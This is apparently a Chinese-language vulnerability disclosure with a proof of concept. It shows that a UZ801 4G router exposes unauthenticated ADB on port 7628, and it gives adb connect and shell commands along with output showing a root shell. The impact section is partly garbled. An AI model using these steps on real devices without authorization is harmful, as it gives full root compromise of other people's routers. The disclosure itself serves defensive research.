Generic OEM UZ801_v2.1 4G LTE 路由器(固件 V3.4.3) 中存在一个严重的不正确的访问控制漏洞。该设备错误地将一个未认证的安卓调试桥(ADB)守护进程(/sbin/adbd)暴露在 TCP 端口 7628 上,供相邻网络(局域网/无线网络)访问。
连接到设备本地网络的攻击者可以利用此缺陷绕过所有认证机制,建立 ADB 连接,并以 root 权限执行任意代码。

/sbin/adbd利用此漏洞可导致系统被完全攻陷。影响包括:
root shell)利用过程无需特殊工具,只需标准的 adb 客户端和相邻网络访问权限。
步骤 1: 连接到 UZ801 路由器的无线网络(默认网关通常为 192.168.100.1)。
步骤 2: 扫描设备以查找开放端口。端口 7628/TCP 将显示为开放状态。
步骤 3: 在攻击者的机器上,向未记录的端口发起 ADB 连接:
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628
步骤 4: 请求交互式 shell:
$ adb -s 192.168.100.1:7628 shell
步骤 5: 攻击者无需任何认证提示即可立即进入 root shell:
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64
仅供教育和授权安全研究目的使用。
本仓库中提供的信息和概念验证仅用于教育目的,并帮助保护网络安全。作者(lamaper)不对任何滥用此信息的行为负责。请勿将此漏洞利用用于您不拥有或未经明确许可测试的设备或网络。